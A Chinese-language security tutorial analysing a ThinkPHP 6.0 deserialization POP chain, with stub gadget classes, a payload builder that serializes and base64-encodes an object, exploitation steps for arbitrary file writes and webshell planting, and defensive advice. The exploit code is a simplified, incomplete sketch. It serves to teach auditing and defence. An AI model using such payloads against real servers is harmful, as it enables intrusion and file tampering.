ThinkPHP6.0反序列化链审计与分析教学文档

1. 前言

本文档将详细分析ThinkPHP6.0中的反序列化漏洞链，通过代码审计的方式揭示漏洞原理，并提供完整的利用方法。本教学适合有一定PHP基础和反序列化知识的安全研究人员。

2. 前置知识

2.1 框架结构

ThinkPHP6.0支持两种应用模式：

• 单应用模式：所有功能在一个应用中实现
• 多应用模式：通过不同目录划分多个应用

2.2 环境搭建

1. 安装Composer：php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
2. 安装ThinkPHP6.0稳定版：composer create-project topthink/think tp6
3. 测试运行：cd tp6 && php think run

3. 反序列化入口

在ThinkPHP6.0中，反序列化漏洞通常出现在以下场景：

• 用户可控的反序列化操作
• 缓存处理
• 会话处理
• 配置文件处理

4. 反序列化链分析

4.1 POP链0x00

目标类：League\Flysystem\Cached\Storage\Adapter

namespace League\Flysystem\Cached\Storage;

class Adapter extends AbstractCache {
    protected $adapter;
    protected $file;
    
    public function __construct($obj) {
        $this->adapter = $obj;
        $this->file = 'DawnT0wn.php';
    }
}

利用点：

• 通过构造特定的$adapter对象和$file属性，可以控制文件写入位置和内容

4.2 相关辅助类

namespace League\Flysystem\Adapter;

abstract class AbstractAdapter {}

class Local extends AbstractAdapter {
    public function has($path) {}
    public function write($path, $contents, Config $config) {}
}

5. 反序列化利用

5.1 构造Payload

$a = new Local();
$b = new Adapter($a);
echo base64_encode(serialize($b));

5.2 利用步骤

1. 构造Local对象作为Adapter的$adapter属性
2. 设置$file属性为要写入的文件名（如'DawnT0wn.php'）
3. 序列化整个对象并base64编码
4. 寻找应用中的反序列化入口点提交payload

6. 漏洞利用效果

成功利用后，攻击者可以在服务器上写入任意文件，可能导致：

• WebShell植入
• 配置文件篡改
• 权限提升

7. 防御措施

1. 避免反序列化用户可控的数据
2. 使用__wakeup()或__destruct()方法进行安全检查
3. 实现对象签名验证
4. 使用PHP 7.0+的allowed_classes选项限制可反序列化的类

8. 代码审计技巧

1. 耐心和专注：反序列化链挖掘需要仔细跟踪每个可能的调用路径
2. 知识储备：熟悉常见PHP魔术方法和框架架构
3. 实践方法：
   • 从__destruct()和__wakeup()方法开始跟踪
   • 查找可控制的属性和方法调用
   • 尝试连接多个类的调用链

9. 总结

ThinkPHP6.0反序列化漏洞的挖掘展示了以下关键点：

1. 框架组件的交互可能引入安全风险
2. 简单的属性控制可能导致严重后果
3. 代码审计需要系统性的方法和丰富的经验

通过本教学，读者应该能够理解ThinkPHP6.0反序列化漏洞的原理，掌握基本的审计方法，并能够构建简单的利用链。更复杂的漏洞挖掘需要结合具体应用场景和更深入的分析。